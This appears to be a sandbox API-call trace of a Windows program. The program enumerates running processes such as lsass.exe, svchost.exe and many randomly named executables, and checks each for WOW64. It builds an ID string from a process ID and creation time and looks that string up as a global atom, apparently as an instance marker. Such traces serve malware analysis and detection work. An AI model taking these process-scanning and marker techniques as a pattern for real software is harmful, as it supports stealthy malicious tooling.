	[0127.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5b80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.322] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.322] CloseHandle (hObject=0x2dc) returned 1
	[0127.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9938, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0127.322] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.323] CloseHandle (hObject=0x2dc) returned 1
	[0127.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.323] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.323] CloseHandle (hObject=0x2dc) returned 1
	[0127.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0127.323] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.323] CloseHandle (hObject=0x2dc) returned 1
	[0127.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0127.324] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.324] CloseHandle (hObject=0x2dc) returned 1
	[0127.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.324] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.324] CloseHandle (hObject=0x2dc) returned 1
	[0127.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0127.324] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.325] CloseHandle (hObject=0x2dc) returned 1
	[0127.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0127.325] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.325] CloseHandle (hObject=0x2dc) returned 1
	[0127.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0127.325] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.325] CloseHandle (hObject=0x2dc) returned 1
	[0127.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.326] GetLastError () returned 0x5
	[0127.327] GetLastError () returned 0x5
	[0127.327] GetLastError () returned 0x5
	[0127.327] GetLastError () returned 0x5
	[0127.327] GetLastError () returned 0x5
	[0127.327] GetLastError () returned 0x5
	[0127.327] GetLastError () returned 0x5
	[0127.327] GetLastError () returned 0x5
	[0127.327] GetLastError () returned 0x5
	[0127.327] GetLastError () returned 0x5
	[0127.327] GetLastError () returned 0x5
	[0127.327] GetLastError () returned 0x5
	[0127.327] GetLastError () returned 0x5
	[0127.327] GetLastError () returned 0x5
	[0127.327] GetLastError () returned 0x5
	[0127.327] GetLastError () returned 0x5
	[0127.327] GetLastError () returned 0x5
	[0127.327] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.327] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0127.327] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0127.327] GetLastError () returned 0x5
	[0127.327] GetLastError () returned 0x5
	[0127.327] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.328] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.329] GetLastError () returned 0x5
	[0127.330] GetLastError () returned 0x5
	[0127.330] GetLastError () returned 0x5
	[0127.330] GetLastError () returned 0x5
	[0127.330] GetLastError () returned 0x5
	[0127.330] GetLastError () returned 0x5
	[0127.330] GetLastError () returned 0x5
	[0127.330] GetLastError () returned 0x5
	[0127.330] GetLastError () returned 0x5
	[0127.330] GetLastError () returned 0x5
	[0127.330] GetLastError () returned 0x5
	[0127.330] GetLastError () returned 0x5
	[0127.330] GetLastError () returned 0x5
	[0127.330] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.330] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0127.330] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.330] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0127.330] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0127.330] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0127.331] CloseHandle (hObject=0x2dc) returned 1
	[0127.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0127.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b59e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.331] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.331] CloseHandle (hObject=0x2dc) returned 1
	[0127.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.331] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.332] CloseHandle (hObject=0x2dc) returned 1
	[0127.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0127.332] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.332] CloseHandle (hObject=0x2dc) returned 1
	[0127.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.332] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.332] CloseHandle (hObject=0x2dc) returned 1
	[0127.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0127.333] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.333] CloseHandle (hObject=0x2dc) returned 1
	[0127.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0127.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0127.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.369] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.369] CloseHandle (hObject=0x2dc) returned 1
	[0127.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0127.370] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.370] CloseHandle (hObject=0x2dc) returned 1
	[0127.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d128, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0127.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.371] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.371] CloseHandle (hObject=0x2dc) returned 1
	[0127.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.371] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.371] CloseHandle (hObject=0x2dc) returned 1
	[0127.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.371] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.371] CloseHandle (hObject=0x2dc) returned 1
	[0127.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5c10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.372] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.372] CloseHandle (hObject=0x2dc) returned 1
	[0127.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0127.372] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.372] CloseHandle (hObject=0x2dc) returned 1
	[0127.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.373] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.373] CloseHandle (hObject=0x2dc) returned 1
	[0127.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5b38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.373] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.373] CloseHandle (hObject=0x2dc) returned 1
	[0127.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.374] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.374] CloseHandle (hObject=0x2dc) returned 1
	[0127.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.374] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.374] CloseHandle (hObject=0x2dc) returned 1
	[0127.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.374] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.374] CloseHandle (hObject=0x2dc) returned 1
	[0127.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d5f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.375] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.375] CloseHandle (hObject=0x2dc) returned 1
	[0127.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0127.375] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.375] CloseHandle (hObject=0x2dc) returned 1
